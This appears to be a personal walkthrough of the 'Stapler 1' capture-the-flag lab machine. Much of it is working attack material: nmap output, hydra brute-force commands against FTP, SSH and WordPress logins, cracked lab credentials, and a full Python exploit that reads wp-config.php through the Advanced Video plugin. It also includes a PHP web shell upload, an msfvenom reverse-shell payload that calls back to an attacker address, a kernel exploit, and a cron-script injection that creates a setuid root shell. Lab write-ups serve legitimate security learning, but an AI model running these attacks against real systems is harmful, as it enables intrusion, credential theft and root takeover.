Yuvraj Singh | Cybersecurity & AI Enthusiast

Stapler 1

6 min read

Recon:

nmap -sC -sV -A 10.0.2.6 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-04 10:57 UTC Nmap scan report for 10.0.2.6 Host is up (0.0012s latency). Not shown: 992 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-syst: | STAT: | FTP server status: | Connected to 10.0.2.15 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 550 Permission denied. 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) |_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) 53/tcp open domain dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http PHP cli server 5.5 or later |_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open doom? | fingerprint-strings: | NULL: | message2.jpgUT | QWux | "DL[E | #;3[ | \xf6 | u([r | qYQq | Y_?n2 | 3M~{ | 9-a)T | L}AJ |_ .npy.9 3306/tcp open mysql MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 10 | Version: 5.7.12-0ubuntu1 | Thread ID: 7 | Capabilities flags: 63487 | Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, LongPassword, ODBCClient, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolOld, SupportsCompression, SupportsLoadDataLocal, IgnoreSigpipes, FoundRows, Speaks41ProtocolNew, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: QAz | \x1Cod\x0Fu\x03\x11X5eM~|d |_ Auth Plugin Name: mysql_native_password 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service Network Distance: 1 hop Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2025-05-04T11:57:40+01:00 |_clock-skew: mean: -20m01s, deviation: 34m38s, median: -2s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-05-04T10:57:40 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_nbstat: NetBIOS name: RED, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)

TRACEROUTE HOP RTT ADDRESS 1 1.15 ms 10.0.2.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 58.37 seconds

Enumeration

Nikto Revealed 2 Files And from vsftpd.conf file, we got anonymous ftp login allowed

usernames so far are:

  1. john
  2. elly
  3. harry
  4. kathy
hydra -l users.txt -P /usr/share/seclists/Passwords/darkc0de.txt -e nsr ftp://10.0.2.6

we got elly with ylle ftp with elly

got few files ftpuser, passwd trying ssh

Another user Barry

grep -E '(/bin/bash|/bin/sh)' passwd | cut -d ':' -f1 > sshusers.txt
hydra -L sshusers -P /pentest/password-recovery/SecLists/Passwords/darkc0de.txt -e nsr 10.0.2.6 ssh_**

User SHayslett , Pass: SHayslett

Checked Port 666, a jpg, download with wget, nothing to see Checked port 12380, page source has a base64 code`

too long Another name Zoe and enum4linux also showed this name

Nikto on 10.0.2.6:12380

ssl can be used

Disable javascript, but nothing interesting after reaload Second Directory

Using Nuclei as Parrot OS dont support WpScan

Found Plugin **Advanced Video plugin**. version 1.0

import random
import urllib2
import re
import ssl
 
url = "https://10.0.2.6:12380/blogblog"  # updated to https
 
# SSL handler to skip certificate verification
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
 
opener = urllib2.build_opener(urllib2.HTTPSHandler(context=ctx))
urllib2.install_opener(opener)
 
randomID = long(random.random() * 100000000000000000L)
 
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
content = objHtml.readlines()
 
for line in content:
    numbers = re.findall(r'\d+', line)
    id = numbers[-1]
    id = int(id) / 10
 
objHtml = urllib2.urlopen(url + '/?p=' + str(id))
content = objHtml.readlines()
 
for line in content:
    if 'attachment-post-thumbnail size-post-thumbnail wp-post-image' in line:
        urls = re.findall('"(https?://.*?)"', line)
        print urllib2.urlopen(urls[0]).read()

script did what xd

so they were uploaded randomly, must be wp-content

cat the download jpeg

mysql -u root -p plbkac -h 10.0.2.6

hydra -L sq_users -P sql_pass -s 12380 10.0.2.6 https-post-form "/blogblog/wp-login.php:user=^USER^&password=^PASS^:Invalid Login" -V

it keeps goin f

seems there are 3 admin, we got one, hydra got all

classic plugin way to get Shell Uploaded the php shell and wp-content to execute`

$ uname -mra && cat /etc/*release* 
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04 LTS"
NAME="Ubuntu"
VERSION="16.04 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
UBUNTU_CODENAME=xenial

ssh did not work for Jkanode, so tried peter JZQuyIN5`

red% sudo -l
 
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
 
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
 
[sudo] password for peter: 
Sorry, try again.
[sudo] password for peter: 
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
User peter may run the following commands on red:
    (ALL : ALL) ALL

This user can execute any command as root, even get root

2

  1. Kernel Exploit as Kernel is outdated
  2. Cronjob Exploit

Method 2: Kernel Exploit

Info

Ubuntu 16.04 LTS (Xenial Xerus) with the 4.4.0-21-generic kernel, which is a relatively old version (released around 2016).

msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.0.2.15 LPORT=4444

This did not work, not able to get shell on metasploit

What

  • Download Exploit_suggeter.sh from github
  • upload to target

Download URL is there

Next

  • Unzip
  • unzip exploit.tar
  • first we need to compile and then run the exploit

We got the Root

Method 3: CronJob

echo "cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash" >> /usr/local/sbin/cron-logrotate.sh

Info

so what is happening is that, this will copy the bin/bash binary to /tmp/rootbash and then setuid & setgid on /tmp/rootbash

  • And this all get append to file logrotate.sh, since this run as root privileges and any user who run /tmp/rootbash will gain root.
find / -perm -2 -type f 2>/dev/null | grep logrotate

Ignore above, for notes purpose

After a while we get rootbash in /tmp directory

Graph View